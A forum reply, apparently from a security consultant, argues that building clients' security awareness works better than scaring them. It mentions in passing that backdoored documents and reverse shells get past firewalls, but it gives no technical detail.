H1t M0nk3y wrote:As long as you can scare your clients, you know/hope they will fix their things.
It's never about "scaring" clients believe it or not. Raising awareness to them goes a hell of a lot longer. Most clients nowadays are aware of the risks but won't fully understand the extent of them.
Today I had to sit through a presentation with the owner of my company and a "Tony Robbins" like salescoach (for lack of better explanation) and explain to him in not-so-technical terms what it is I can do (we as a company). I explained to him briefly the differences in extrusion and intrusion detection systems fail as do firewalls. I had to tone it down to make things understood (the risks).
After explaining it to him, he sort of got it but was shocked at the speed at which I could get into machines/networks. Now, this doesn't make me "uberhacker" on the contrary I could say it makes some clients, uberlackingincommon sense. Take a look at a vast majority of what people are calling "insider threats." Does someone clicking on a loaded link (backdoored pdf, doc, html link etc) constitute an insider attack? You bet it down. Remember a reverse shell is someone connecting TO THE attacker. Kiss your firewall goodbye (when done properly.)
Awareness goes a long way. Client's don't want to be scared and its not where you want them to be. Scared people don't think straight Besides they've already heard this routine time and time again: "Buy this firewall, guaranteed to stop...", "Oh you need this shiny sparkly blinky-light IPS", "What you really need is DLP" and the list goes on. What people REALLY need is awareness. Expressing this to a client is guaranteed to always keep you in mind with them.
Think about that for a bit... If it were you and you were speaking to say a family member, friend, colleague, golfing buddy etc., would you remember someone who scared you or someone who made you think in a more positive light?